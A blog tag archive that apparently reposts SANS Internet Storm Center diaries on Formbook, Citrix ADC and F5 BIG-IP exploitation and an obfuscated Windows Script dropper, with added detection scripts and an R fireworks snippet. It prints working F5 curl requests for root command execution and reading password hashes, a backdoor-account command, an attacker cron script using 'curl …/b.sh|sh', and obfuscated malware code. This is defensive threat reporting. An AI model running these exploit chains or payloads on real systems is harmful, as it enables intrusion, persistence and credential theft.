Tag Archives: Security

Excel spreadsheet macro kicks off Formbook infection, (Fri, Jul 10th)

This post was originally published on this site

Introduction

Formbook has been around for years. According to FireEye, Formbook has been “...advertised in various hacking forums since early 2016.” My previous diary about Formbook was back in November 2019, and not much has changed since then. It is still worth documenting, though, if only to show this malware is still active and remains part of our threat landscape.

Today’s diary covers a Formbook infection from Thursday, June 9th 2020.


Shown above:  Flow chart for the Formbook infection covered in today’s diary.

The lure

The lure for this particular infection was a malicious Excel spreadsheet.  Searching through VirusTotal, I found a malware sample that I tested in my lab.  The submission name was /tmp/eml_attach_for_scan/2433e76542036ab53b138a98eeda548a.file, so I don’t know what the original file name was.


Shown above: Malicious Excel spreadsheet I found in VirusTotal.


Shown above: The malicious spreadsheet opened on a vulnerable Windows 10 host, ready for me to enable macros.

Initial infection

The initial infection happened immediately after I enabled macros, when my lab host retrieved a Windows executable (EXE) for Formbook from hxxp://sagc[.]be/svc.exe and executed the file. See the images below for details.


Shown above:  My lab host retrieving the Formbook EXE from sagc[.]be after enabling macros.


Shown above: Initial location where the Formbook EXE was saved to my lab host.


Shown above:  Formbook EXE’s final location on my infected lab host with a Windows registry update to keep it persistent.

Data exfiltration

Post-infection traffic was sent to several different domains using URL patterns shown in the next image.


Shown above: Traffic from an infection filtered in Wireshark.

Data stolen by Formbook included a screenshot of my infected lab host, along with keystroke logs, application passwords, sensitive data from the browser cache, and information contained in the clipboard. This data is temporarily stored in a randomly-named folder under the infected user’s AppData\Roaming directory. These artifacts are deleted after the data is exfiltrated through Formbook command and control (C2) traffic.


Shown above: Stolen data from the infected Windows host, waiting for Formbook to exfiltrate it over C2 traffic.

Indicators of Compromise (IoCs)

SHA256 hash: 148a026124126abf74c390c69fbd0bcebce06b600c6a35630cdce29a85a765fc

  • File size: 94,829 bytes
  • File name: unknown
  • File type: Microsoft Excel 2007+
  • File description: Excel spreadsheet with macro for Formbook malware

SHA256 hash: 9ebc903ca6847352aaac87d7f904fe4009c4b7b7acc9b629e5610c0f04dac4ef

  • File size: 481,792 bytes
  • File location: hxxp://sagc[.]be/svc.exe
  • File location: C:\Users\[username]\AppData\Local\Temp\putty.exe
  • File location: C:Program Files (x86)Bwlsuserwzqlrdw.exe
  • File description: Windows executable (EXE) file for Formbook malware

Traffic from an infected Windows host:

Excel macro retrieves Formbook EXE:

  • 92.48.206[.]34 port 80 – sagc[.]be – GET /svc.exe

Formbook post-infection traffic:

  • 157.7.107[.]81 port 80 – www.lovelydays[.]info – GET /ns424/?[long string]
  • 23.235.199[.]50 port 80 – www.rightwebmarketing[.]com – GET /ns424/?[long string]
  • 23.235.199[.]50 port 80 – www.rightwebmarketing[.]com – POST /ns424/
  • 63.250.34[.]167 port 80 – www.mansiobok2[.]info – GET /ns424/?[long string]
  • 63.250.34[.]167 port 80 – www.mansiobok2[.]info – POST /ns424/
  • 34.102.136[.]180 port 80 – www.confidentbeauty[.]tips – GET /ns424/?[long string]
  • 34.102.136[.]180 port 80 – www.confidentbeauty[.]tips – POST /ns424/
  • 198.54.117[.]217 port 80 – www.donateoneeight[.]net – GET /ns424/?[long string]
  • 198.54.117[.]217 port 80 – www.donateoneeight[.]net – POST /ns424/

Unresolved DNS queries from the infected Windows host caused by Formbook:

  • DNS query for www.bakingandcookingandmore[.]com – response: No such name
  • DNS query for www.systemscan12[.]top – response: No such name
  • DNS query for www.lux-dl[.]com – response: No such name
  • DNS query for www.duongtinhot24h[.]com – response: No such name
  • DNS query for www.kcsmqd[.]com – response: No such name
  • DNS query for www.pksbarandgrill[.]net – response: No such name
  • DNS query for www.lx-w[.]com – response: No such name
  • DNS query for www.costcocanadaliguor[.]com – response: No such name
  • DNS query for www.autohaker[.]com – response: No such name
  • DNS query for www.e-golden-boy[.]com – response: No such name
  • DNS query for www.angelalevelsup[.]com – response: No such name
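As an added example (not part of Brad’s diary), the following Python script turns the traffic pattern above into a detection: the same short URI path (/ns424/) requested on several unrelated domains, a GET with a query string followed by a POST to the same path, and a burst of NXDOMAIN answers for a single client. The proxy and DNS log lines are constructed; the domains are taken from the IoC list, and the query strings stand in for the “[long string]” shown above.

```python
"""Flag Formbook-style C2 behaviour in proxy and DNS logs.

Added example for this diary, not code from the original post.  The sample
log lines are constructed; the domains come from the diary's IoC list and the
query strings stand in for the "[long string]" the diary redacts.
"""
from collections import defaultdict
from urllib.parse import urlsplit

# Constructed proxy log: client server:port method url status
PROXY_LOG = """\
10.0.0.5 157.7.107.81:80 GET http://www.lovelydays.info/ns424/?abcd=CONSTRUCTEDLONGSTRING 200
10.0.0.5 23.235.199.50:80 GET http://www.rightwebmarketing.com/ns424/?abcd=CONSTRUCTEDLONGSTRING 200
10.0.0.5 23.235.199.50:80 POST http://www.rightwebmarketing.com/ns424/ 200
10.0.0.5 63.250.34.167:80 GET http://www.mansiobok2.info/ns424/?abcd=CONSTRUCTEDLONGSTRING 200
10.0.0.5 63.250.34.167:80 POST http://www.mansiobok2.info/ns424/ 200
10.0.0.5 93.184.216.34:443 GET https://www.example.com/index.html 200
10.0.0.7 93.184.216.34:443 POST https://www.example.com/login 302
"""

# Constructed DNS log: client queried-name rcode
DNS_LOG = """\
10.0.0.5 www.bakingandcookingandmore.com NXDOMAIN
10.0.0.5 www.systemscan12.top NXDOMAIN
10.0.0.5 www.lux-dl.com NXDOMAIN
10.0.0.5 www.duongtinhot24h.com NXDOMAIN
10.0.0.5 www.kcsmqd.com NXDOMAIN
10.0.0.5 www.pksbarandgrill.net NXDOMAIN
10.0.0.5 www.example.com NOERROR
10.0.0.7 www.example.com NOERROR
10.0.0.7 www.typo-domain.test NXDOMAIN
"""


def parse_proxy(text):
    """Yield one dict per proxy log line (blank lines skipped)."""
    for line in text.splitlines():
        if not line.strip():
            continue
        client, _server, method, url, _status = line.split()
        u = urlsplit(url)
        yield {"client": client, "method": method, "host": u.hostname,
               "path": u.path, "query": u.query}


def find_shared_c2_paths(text, min_domains=3):
    """Paths one client requested on at least `min_domains` different hosts.

    Formbook uses a single URI path (here /ns424/) against many C2 domains,
    which ordinary browsing almost never does.  Returns {client: {path: [hosts]}}.
    """
    seen = defaultdict(lambda: defaultdict(set))
    for r in parse_proxy(text):
        seen[r["client"]][r["path"]].add(r["host"])
    hits = {}
    for client, paths in seen.items():
        flagged = {p: sorted(h) for p, h in paths.items() if len(h) >= min_domains}
        if flagged:
            hits[client] = flagged
    return hits


def find_get_then_post_hosts(text):
    """(client, host, path) tuples where a GET carrying a query string and a
    POST hit the same path: the check-in/upload pattern in the IoC list."""
    get_seen, post_seen = set(), set()
    for r in parse_proxy(text):
        key = (r["client"], r["host"], r["path"])
        if r["method"] == "GET" and r["query"]:
            get_seen.add(key)
        elif r["method"] == "POST":
            post_seen.add(key)
    return sorted(get_seen & post_seen)


def find_nxdomain_bursts(text, threshold=5):
    """Clients with at least `threshold` NXDOMAIN answers: the infected host
    queries a list of names, most of which do not resolve."""
    counts = defaultdict(int)
    for line in text.splitlines():
        if not line.strip():
            continue
        client, _name, rcode = line.split()
        if rcode == "NXDOMAIN":
            counts[client] += 1
    return {c: n for c, n in counts.items() if n >= threshold}


if __name__ == "__main__":
    print(find_shared_c2_paths(PROXY_LOG))
    print(find_get_then_post_hosts(PROXY_LOG))
    print(find_nxdomain_bursts(DNS_LOG))
```

The thresholds are deliberately conservative: a legitimate CDN or analytics path can also show up on a couple of domains, so the path rule only fires at three or more, and the NXDOMAIN rule is meant to be read together with the HTTP hits for the same client rather than on its own.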

Final words

Formbook infections work nearly the same as they did when I wrote my first diary about Formbook in October 2017.  I’m surprised that I still occasionally run across a sample during my day-to-day research.  An up-to-date Windows 10 with default security settings should prevent these sorts of infection from happening.  I guess it’s still somehow profitable for criminals behind Formbook to continue developing this malware.  Apparently, there’s no shortage of vulnerable Windows hosts for potential targets.

A pcap of the infection traffic and malware samples for today’s diary can be found here.


Brad Duncan
brad [at] malware-traffic-analysis.net

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Active Exploit Attempts Targeting Recent Citrix ADC Vulnerabilities CTX276688 , (Thu, Jul 9th)


I just can’t get away from vulnerabilities in perimeter security devices. In the last couple of days, I spent a lot of time with our F5 BigIP honeypot. But looks like I have to revive the Citrix honeypot again. As of today, my F5 honeypot is getting hit by attempts to exploit two of the Citrix vulnerabilities disclosed this week [1]. Details with proof of concept code snippets were released yesterday [2].

It is not clear exactly which CVE was assigned to which vulnerability, but the possible candidates are CVE-2020-8195, CVE-2020-8196, 

The first issue, probably the more severe one, allows arbitrary file downloads. I see this issue currently exploited from just one IP address: 13.232.154.46 (Amazon... my honeypot must have Amazon Prime to get exploits the next day).

POST /rapi/filedownload?filter=path:%2Fetc%2Fpasswd HTTP/1.1 

The second vulnerability (which I don’t think has a CVE assigned to it, but I will update this diary if I find one), allows retrieval of a PCI-DSS report without authentication. Actually… you still need to “authenticate” I guess, by adding “sig_name=_default_signature_” to the URL :/. 

The full request I see being used (just the Apache log):

POST /pcidss/report?username=nsroot&set=1&type=allprofiles&sid=loginchallengeresponse1requestbody HTTP/1.1" 404 211 "-" "python-requests/2.19.1"

Interestingly, so far most of the IPs scanning for this vulnerability belong to “hostwindsdns.com”.

Current IPs:

23.254.164.181
23.254.164.48
43.245.160.163
104.168.166.234
104.168.194.148
142.11.213.254
142.11.227.204
192.119.73.107
192.119.73.108
192.236.162.232
192.236.163.117
192.236.163.119
192.236.192.119
192.236.192.3
192.236.192.5
192.236.192.6

The vulnerability isn’t all that “bad” (I have to look if the report leaks anything specific). It is not allowing access to anything else. But it could very well be used to identify unpatched devices. Some of the other vulnerabilities patched with this update are “interesting”, but more tricky to exploit.

[1] https://www.citrix.com/blogs/2020/07/07/citrix-provides-context-on-security-bulletin-ctx276688/
[2] https://dmaasland.github.io/posts/citrix.html


Johannes B. Ullrich, Ph.D., Dean of Research, SANS Technology Institute


If You Want Something Done Right, You Have To Do It Yourself… Malware Too!, (Wed, Jul 8th)


I’m teaching FOR610[1] this week and today is dedicated to malicious web and document files. That’s a good opportunity to share with you a Windows Script that uses a nice obfuscation technique. The attacker’s idea is to use a big array containing the second stage payload and interesting strings:

var Kerosene = [
function(){
var Odds = "m!FyIG5lbTQ0Ow0Km!FyIGxvb!mUZXh0ID0gIlVFc0RC …";
return [function(){
eval("Odds = Odds.replace(new RegExp(\"!@@\", \"g\"), \"A\");");
eval("\x4F\x64\x64\x73\x20\x3D\x20\x4F\x64\x64\x73\x2E\x72\x65\x70\x6C\x61\x63\x65\x28\x6E\x65\x77\x20\x52\x65\x67\x45\x78\x70\x28\x22\x6D\x22\x2C\x20\x22\x67\x22\x29\x2C\x20\x22\x64\x22\x29\x3B");
eval("\x4F\x64\x64\x73\x20\x3D\x20\x4F\x64\x64\x73\x2E\x72\x65\x70\x6C\x61\x63\x65\x28\x6E\x65\x77\x20\x52\x65\x67\x45\x78\x70\x28\x22\x21\x22\x2C\x20\x22\x67\x22\x29\x2C\x20\x22\x6D\x22\x29\x3B");
return Odds;
}][0]();
},
Array("CreateObject","ReadText","undefined","\x61\x64\x6F\x64\x62\x2E","\x43\x68\x61\x72\x53\x65\x74","\x50\x6F\x73\x69\x74\x69\x6F\x6E","\x54\x79\x70\x65","Open","Write","nodeTypedValue"),null
];

Like JavaScript, Windows Script is very permissive regarding data types, and you can mix functions and strings in the same array. The first element of the Kerosene[] array is a function that deobfuscates a very long string that has also been polluted with character substitutions. Once these characters are replaced with the right ones, you can decode the Base64 string and get the second payload. The other elements are in a second array, some of them hex-encoded. Then the following code is executed:

Kerosene[3] = Array(WSH[Kerosene[1][0]]("\x61\x64\x6F\x64\x62\x2E\x73\x74\x72\x65\x61\x6D"),
                    WSH[Kerosene[1][0]]("microsoft.xmldom").createElement("cfg"),
                    {bmx: "\x75\x73\x2D\x61\x73\x63\x69\x69"});
Kerosene[4] = function(){return Kerosene[3][0];};
[function(){
  Kerosene[3][1].dataType = "\x62\x69\x6E\x2E\x62\x61\x73\x65\x36\x34";
  Kerosene[3][1].text = Kerosene[0]();
  [function(){
    eval("Kerosene[4]()[Kerosene[1][6]] = 1;Kerosene[4]()[Kerosene[1][7]]();Kerosene[4]()[Kerosene[1][8]](Kerosene[3][1][Kerosene[1][9]]);");
    eval("Kerosene[4]()[Kerosene[1][5]] = 0;Kerosene[4]()[Kerosene[1][6]] = 2;");
    eval("Kerosene[4]()[Kerosene[1][4]] = Kerosene[3][2].bmx;");
    eval("Kerosene = [Array(eval), Kerosene[4](), [Kerosene[1][1]]];");
  }][0]();
}][0]();

Kerosene[0][0](Kerosene[1][Kerosene[2]]());

How does it work? References to array elements are replaced by their values during execution. For example:

WSH[Kerosene[1][0]]("\x61\x64\x6F\x64\x62\x2E\x73\x74\x72\x65\x61\x6D")

becomes:

WSH["CreateObject"]("adodb.stream")

The second payload implements the same obfuscation technique (a Base64 payload is decoded after replacing some garbage characters). The script applies the principle of “help yourself”: the interesting function is GrabJreFromNet(), which tries to download a Java Runtime Environment if one is not already installed on the victim’s computer. The package is grabbed from this URL: hxxp://ops[.]com[.]pa/jre7.zip
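As an added example (not from the diary or from the sample itself), here is a small Python deobfuscator that reproduces the three layers the script applies to its own strings: the hex escapes, the three replace() calls in the order the first array element performs them, and Base64. ODDS_PREFIX is the visible start of the Odds string quoted above; the pollute() helper is my own addition, used only to build round-trip test input.

```python
"""Undo the string obfuscation layers used by the Windows Script above.

Added example, not code from the diary or from the malware: it re-implements
the three steps the script performs on itself (hex escapes, character
substitution, Base64) so the strings can be decoded offline.
"""
import base64
import re

# Matches one backslash-x hex escape, e.g. the two-digit code for 'a'.
HEX_ESCAPE = re.compile(r"\\x([0-9A-Fa-f]{2})")

# Substitutions in the order the first array element applies them.
SUBSTITUTIONS = [("!@@", "A"), ("m", "d"), ("!", "m")]

# The visible start of the Odds string, copied from the diary.
ODDS_PREFIX = "m!FyIG5lbTQ0Ow0Km!FyIGxvb!mUZXh0ID0gIlVFc0RC"


def decode_hex_escapes(s):
    """Turn a string of hex escapes into the text the script engine sees."""
    return HEX_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), s)


def unpollute(s, subs=SUBSTITUTIONS):
    """Apply the replace() chain in order.  Order matters: the second step
    turns every 'm' into 'd', and only then does '!' become 'm'."""
    for old, new in subs:
        s = s.replace(old, new)
    return s


def decode_payload(polluted):
    """Substitutions first, then Base64 (padding repaired for excerpts)."""
    b64 = unpollute(polluted)
    if len(b64) % 4 == 1:   # a lone trailing symbol cannot encode a byte
        b64 = b64[:-1]
    b64 += "=" * (-len(b64) % 4)
    return base64.b64decode(b64).decode("utf-8", errors="replace")


def pollute(clean_b64, subs=SUBSTITUTIONS):
    """Inverse of unpollute(); my helper for building test input.  It is
    exact because the Base64 alphabet contains neither '!' nor '@'."""
    for old, new in reversed(subs):
        clean_b64 = clean_b64.replace(new, old)
    return clean_b64


if __name__ == "__main__":
    print(decode_hex_escapes(r"\x61\x64\x6F\x64\x62\x2E\x73\x74\x72\x65\x61\x6D"))
    print(repr(decode_payload(ODDS_PREFIX)))
```

Running decode_payload() on the visible prefix gives var nem44;\r\nvar longText = "UEsDB, so the second stage opens by declaring another Base64 blob; UEsDB is how Base64 of the bytes PK 03 04 (a zip local file header) begins, which fits the Zip/JAR the diary describes further down.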

The script performs the following test to detect if Java is available or not:

var text = "";
try {
  text = wshShell.RegRead("HKLM\\SOFTWARE\\Wow6432Node\\JavaSoft\\Java Runtime Environment\\CurrentVersion");
  text = wshShell.RegRead("HKLM\\SOFTWARE\\Wow6432Node\\JavaSoft\\Java Runtime Environment\\" + text + "\\JavaHome");
} catch(err) {}
try {
  if (text == "") {
    text = wshShell.RegRead("HKLM\\SOFTWARE\\JavaSoft\\Java Runtime Environment\\CurrentVersion");
    text = wshShell.RegRead("HKLM\\SOFTWARE\\JavaSoft\\Java Runtime Environment\\" + text + "\\JavaHome");
    if (text != "") {
      text = text + "\\bin\\javaw.exe";
    }
  }
  else {
    text = text + "\\bin\\javaw.exe";
  }
} catch(err) {}
try {
  if (text != "") {
    //wshShell.RegWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\ntfsmgr", "\"" + text + "\" -jar \"" + stubpath + "\"", "REG_SZ");
    wshShell.run ("\"" + text + "\" -jar \"" + stubpath + "\"");
  } else {
    GrabJreFromNet();
  }
} catch(err) {}

The third payload is a Zip file (a JAR file) that contains a classic AdWind backdoor (SHA256: 3c4e2ca8a7b7cd1eb7ff43851d19a456914f0e0307dfe259813172e955d7f2ab)[2].

[1] http://for610.com
[2] https://www.virustotal.com/gui/file/3c4e2ca8a7b7cd1eb7ff43851d19a456914f0e0307dfe259813172e955d7f2ab/detection

Xavier Mertens (@xme)
Senior ISC Handler – Freelance Cyber Security Consultant


F5 BigIP vulnerability exploitation followed by a backdoor implant attempt, (Tue, Jul 7th)


While monitoring SANS Storm Center’s honeypots today, I came across the second F5 BIG-IP CVE-2020-5902 vulnerability exploitation followed by a backdoor deployment attempt. The first one was seen by Johannes yesterday [1].

Running the backdoor binary (ELF) on a separate system, it was possible to verify that it establishes an SSL connection to the address web[.]vpnkerio.com (52[.]32.180.34:443).

Looking up web[.]vpnkerio.com on VirusTotal while writing this diary, I could find no AV detecting the network addresses or the binary hash as malicious.

For persistence, it writes a line to the “/etc/init.d/rc.local” file in an attempt to start on system boot.

Examining the binary statically, it is possible to see the string python -c 'import pty;pty.spawn("/bin/sh")'. It will require more analysis, but it may be used by the attacker to get an interactive terminal on the target system. A proper terminal is usually required for the attacker to run commands like ‘su’.

IOCs:

Exploitation attempt source:
96[.]45.187.52

Backdoor URL:
http://104[.]238.140.239:8080/123

C2 communication:
web[.]vpnkerio.com
52[.]32.180.34:443

The backdoor binary:
90ce1320bd999c17abdf8975c92b08f7 (MD5)
a8acda5ddfc25e09e77bb6da87bfa157f204d38cf403e890d9608535c29870a0 (SHA256)

References

[1] https://isc.sans.edu/forums/diary/Summary+of+CVE20205902+F5+BIGIP+RCE+Vulnerability+Exploits/26316/


Renato Marinho
Morphus Labs


Summary of CVE-2020-5902 F5 BIG-IP RCE Vulnerability Exploits, (Mon, Jul 6th)


Our honeypots have been busy collecting exploit attempts for CVE-2020-5902, the F5 Networks BIG-IP vulnerability patched last week. Most of the exploits can be considered reconnaissance. We only saw one working exploit installing a backdoor. Bad Packets reported seeing a DDoS bot being installed.

The simplest way to achieve limited command execution is to use BIG-IP command-line interface commands. But that function is a bit limited. To achieve full-featured command execution, it is possible to just create an alias that points to “bash”.

The result is full code execution in three steps (these requests can use POST or GET; I am using GET here to make them easier to display):

1. Create an “alias” to map the “list” command to “bash”

curl 'https://f5.sans.edu/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=create+cli+alias+private+list+command+bash'

{"error":"","output":""}

2. Write a file to /tmp with the command to be executed

curl 'https://f5.sans.edu/tmui/login.jsp/..;/tmui/locallb/workspace/fileSave.jsp?fileName=/tmp/cmd&content=id'

[several empty lines as output]

3. Use the alias to execute the command.

curl 'https://f5.sans.edu/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+/tmp/cmd'

{"error":"","output":"uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:initrc_t:s0\n"}

4. Optionally: remove the alias.

curl 'https://f5.sans.edu/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=delete+cli+alias+private+list'

{"error":"","output":""}

If you do not need code execution, you can also use “Step 2” to write files, or you can just read arbitrary files in one step using:

curl -k 'https://f5.sans.edu/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/f5-release'

{"output":"BIG-IP release 15.1.0.1 (Final)\n"}

Instead of defining an alias, the technique in step 1 can also be used to execute BIG-IP CLI commands directly, for example to retrieve password hashes (note this only works if the alias is not defined):

curl 'https://f5.sans.edu//tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin'

{"error":"","output":"auth user admin {\n    description \"Admin User\"\n    encrypted-password $6$oeE7u1cp$5cOu9tYnEiXYx/6UuyOTfgJw5nUgXnetzipHdcX7oRc3xwehAFdQGmhzocud3CGH6MYZgqLGb8u6KiITWBsHi/\n    partition Common\n    partition-access {\n        all-partitions {\n            role admin\n        }\n    }\n    shell none\n}\n"}

Most of the commands I have seen so far are “id”, “ls” and retrieving files like “/etc/passwd” and the BIG-IP license file. More interesting commands:

* Adding a backdoor root account:

tmsh create auth user f5admin password getrektdotcom partition-access add { all-partitions { role admin } } shell bash

* Adding a backdoor cron job:

curl 217.12.199.179/b.sh|sh

which retrieves:

#!/bin/sh
ulimit -n 65535
rm -f /etc/ld.so.preload

LDR="wget -q -O -"
if [ -s /usr/bin/curl ]; then
  LDR="curl"
fi
if [ -s /usr/bin/wget ]; then
  LDR="wget -q -O -"
fi

crontab -l | grep -e "217.12.199.179" | grep -v grep
if [ $? -eq 0 ]; then
  echo "cron good"
else
  (
    crontab -l 2>/dev/null
    echo "* * * * * $LDR http://217.12.199.179/b.sh | sh > /dev/null 2>&1"
  ) | crontab -
fi

This will check the URL once a minute for updates via cron. So far, I have not seen any other scripts returned. Interestingly, after sending an abuse complaint to the ISP hosting the script, my home IP can no longer connect to the site.


Johannes B. Ullrich, Ph.D., Dean of Research, SANS Technology Institute


CVE-2020-5902: F5 BIG-IP RCE Vulnerability, (Mon, Jul 6th)


A remote code execution vulnerability CVE-2020-5902 in F5’s BIG-IP with CVSS score 10 is actively exploited.

Vulnerable versions are:

  • 11.6.1-11.6.5.1
  • 12.1.0-12.1.5.1
  • 13.1.0-13.1.3.3
  • 14.1.0-14.1.2.5
  • 15.0.0-15.1.0.3

A directory traversal in the Traffic Management User Interface (TMUI) allows upload and execution of scripts (as root) by unauthenticated attackers.

F5 has released patched versions:

  • 11.6.5.2
  • 12.1.5.2
  • 13.1.3.4
  • 14.1.2.6
  • 15.1.0.4

F5’s KB article K52145254: TMUI RCE vulnerability CVE-2020-5902.

We have observed Internet scans for this vulnerability. Note that an attack over the Internet requires that F5’s BIG-IP control plane is exposed to the Internet (there are 8400+ F5 systems on the Internet according to Shodan).

Several exploits and a Metasploit module for this vulnerability are public.

There is also a sigma rule and an nmap script (remark: not released by nmap).

We recommend patching this vulnerability immediately if you expose the TMUI to the Internet; if you cannot do that, remove direct access to the TMUI from the Internet.

In any case, go over your logs to identify exploitation attempts (F5 published the KB July 1st, and the first exploitation attempts on the Internet were observed starting July 3rd): look for “..;” in the URLs. If you use grep (or another tool with regular expressions) to search through your logs, remember that . matches any character: use a fixed string (option -F in grep).

And let me close with Johannes’ closing remark on today’s StormCast: “… certainly make sure that the management plane is not exposed to the public Internet, who knows when the next vulnerability in this feature will be found!”

Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com DidierStevensLabs.com


CVE-2020-5902 F5 BIG-IP Exploitation Attempt, (Sun, Jul 5th)


A quick heads-up: we are seeing scans for F5 BIG-IP’s vulnerability CVE-2020-5902.

They look like this (Host header redacted):

GET /tmui/login.jsp/..;/tmui/util/getTabSet.jsp?tabId=jaffa HTTP/1.1
Host: x.x.x.x
User-Agent: Nuclei – Open-source project (github.com/projectdiscovery/nuclei)
Accept: */*
Accept-Language: en
Connection: close
Accept-Encoding: gzip

Here is a sigma rule for CVE-2020-5902.
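As an added example (not from any of these diaries), the Python script below applies the log-review advice from the CVE-2020-5902 diary and the request lines from the Citrix ADC CTX276688 diary to Apache combined-format access logs: it matches “..;” as a fixed string rather than a regex, flags the /rapi/filedownload and /pcidss/report request paths, and shows how many extra lines a regex search for ..; would have matched. The log lines are constructed from the request lines quoted in those diaries; 203.0.113.9 and 198.51.100.4 are documentation addresses used as placeholders.

```python
"""Scan access logs for the Citrix ADC and F5 BIG-IP requests in these diaries.

Added example, not from any of the diaries.  The log lines are constructed in
Apache combined format from the request lines the diaries quote; 13.232.154.46
and 23.254.164.181 are the sources named in the Citrix diary, while
203.0.113.9 and 198.51.100.4 are documentation addresses used as placeholders.
"""
import re

SAMPLE_LOG = """\
13.232.154.46 - - [09/Jul/2020:08:15:02 +0000] "POST /rapi/filedownload?filter=path:%2Fetc%2Fpasswd HTTP/1.1" 404 211 "-" "python-requests/2.19.1"
23.254.164.181 - - [09/Jul/2020:08:16:40 +0000] "POST /pcidss/report?username=nsroot&set=1&type=allprofiles&sid=loginchallengeresponse1requestbody HTTP/1.1" 404 211 "-" "python-requests/2.19.1"
203.0.113.9 - - [05/Jul/2020:11:02:13 +0000] "GET /tmui/login.jsp/..;/tmui/util/getTabSet.jsp?tabId=jaffa HTTP/1.1" 200 512 "-" "Nuclei - Open-source project (github.com/projectdiscovery/nuclei)"
203.0.113.9 - - [05/Jul/2020:11:02:14 +0000] "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/f5-release HTTP/1.1" 200 120 "-" "curl/7.68.0"
198.51.100.4 - - [05/Jul/2020:11:05:00 +0000] "GET /tmui/login.jsp HTTP/1.1" 200 3000 "-" "Mozilla/5.0"
198.51.100.4 - - [05/Jul/2020:11:05:03 +0000] "GET /static/app;v=2.js HTTP/1.1" 200 3000 "-" "Mozilla/5.0"
"""

# Apache combined log format: ip ident user [time] "method target proto" status bytes "referer" "ua"
CLF_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

# Each rule is a plain-string test on the request target, deliberately not a regex.
RULES = {
    "f5-tmui-traversal": lambda t: "..;" in t,
    "citrix-rapi-filedownload": lambda t: t.startswith("/rapi/filedownload"),
    "citrix-pcidss-report": lambda t: t.startswith("/pcidss/report"),
}


def parse_log(text):
    """Yield one dict per well-formed combined-format line."""
    for line in text.splitlines():
        m = CLF_RE.match(line)
        if m:
            yield m.groupdict()


def scan_log(text):
    """Return one hit per (line, rule) match: source ip, rule, target, user-agent."""
    hits = []
    for rec in parse_log(text):
        for name, test in RULES.items():
            if test(rec["target"]):
                hits.append({"ip": rec["ip"], "rule": name,
                             "target": rec["target"], "ua": rec["ua"]})
    return hits


def count_traversal_matches(text):
    """Why the diary says to grep for "..;" as a fixed string: as a regex the
    two dots match any characters, so any ';' inside a URL also matches."""
    fixed = regex = 0
    for rec in parse_log(text):
        if "..;" in rec["target"]:
            fixed += 1
        if re.search("..;", rec["target"]):
            regex += 1
    return {"fixed": fixed, "regex": regex}


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit["ip"], hit["rule"], hit["target"])
    print(count_traversal_matches(SAMPLE_LOG))
```

On the sample the fixed-string check finds the two traversal requests, while the regex form also picks up the harmless /static/app;v=2.js line, which is exactly the false positive grep -F avoids; on a real log the status code is worth keeping in the hit as well, since a 200 on a “..;” request is far more interesting than a 404.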

Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com DidierStevensLabs.com


Wireshark 3.2.5 Released, (Sun, Jul 5th)


Wireshark version 3.2.5 was released.

It has a vulnerability fix and bug fixes.

A vulnerability in the GVCP dissector (CVE-2020-15466) can be abused to cause an infinite loop.

Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com DidierStevensLabs.com


Happy FouRth of July from the Internet Storm Center, (Sat, Jul 4th)


For our readers in the United States, the 4th of July is Independence Day. As the 4th, under normal COVID-free circumstances, is typically celebrated with fireworks events, I thought I’d deviate a bit from information security topics and instead share a bit of code to create your own fireworks using R, a language and environment for statistical computing and graphics. My teams and I use R and Python constantly as part of security data analytics, particularly for data science and machine learning to further our detection practices and better identify anomalies of significance. You can follow along at home using RStudio as your IDE, and the latest version of R, 4.0.2 as this is written. All credit is due specifically to Edward Visel of Uptake, this is entirely his code, just modified ever so slightly for our purposes here. Edward was experimenting on his path to the perfect R-generated firework but I like each of them as variants in and of themselves. In the spirit of the old red, white, and blue, I selected three specific patterns, namely his explosion, particles and gnats, and the final firework. This work uses the tidyverse, sf, and gganimate packages, I pulled in magick to manipulate the resulting GIFs a bit. If you just want the TL;DR version, the results of the effort follows immediately, the code is in-line immediately thereafter. Happy 4th of July for those of you who celebrate it, cheers, stay safe and healthy to all!

Russ McRee | @holisticinfosec

Red

library(tidyverse)
library(sf)
library(gganimate)
library(magick)

theme_set(theme_void() + theme(
  panel.background = element_rect(fill = 'black')
))

#Explosion
p1 <- map_dfr(1:10, ~crossing(
  x = runif(30),
  nesting(
    y = seq(1, .x, length.out = 10)^0.5,
    t = 1:10)
)
) %>%
  ggplot(aes(x, y)) +
  geom_point(color = 'red') +
  coord_polar() +
  transition_time(t) +
  shadow_wake(0.5)

p1_gif <- animate(p1, renderer = gifski_renderer(), fps = 50,
                  width = 250, height = 250)

#Particles & Gnats
p2 <- map_dfr(1:10, ~tibble(y = seq(1, .x, length.out = 10), t = 1:10)) %>%
  mutate(x = runif(n())) %>%
  ggplot(aes(x, y)) +
  geom_point(color = 'white') +
  coord_polar() +
  transition_time(t) +
  shadow_wake(0.5)

p2_gif <- animate(p2, renderer = gifski_renderer(), nframes = 70, fps = 50,
                  width = 250, height = 250)

#Firework

p3 <- map_dfr(1:10, ~crossing(
  x = {
    x = seq(30) + 0.6*.x;
    ifelse(x > 30, x - 30, x)
  },
  nesting(
    y = seq(1, .x, length.out = 10)^0.5,
    t = 1:10)
)
) %>%
  ggplot(aes(x, y)) +
  geom_point(color = 'blue') +
  coord_polar() +
  transition_time(t) +
  shadow_wake(0.3)

p3_gif <- animate(p3, renderer = gifski_renderer(), fps = 50,
                  width = 250, height = 250)

p1_mgif <- image_read(p1_gif)
p2_mgif <- image_read(p2_gif)
p3_mgif <- image_read(p3_gif)

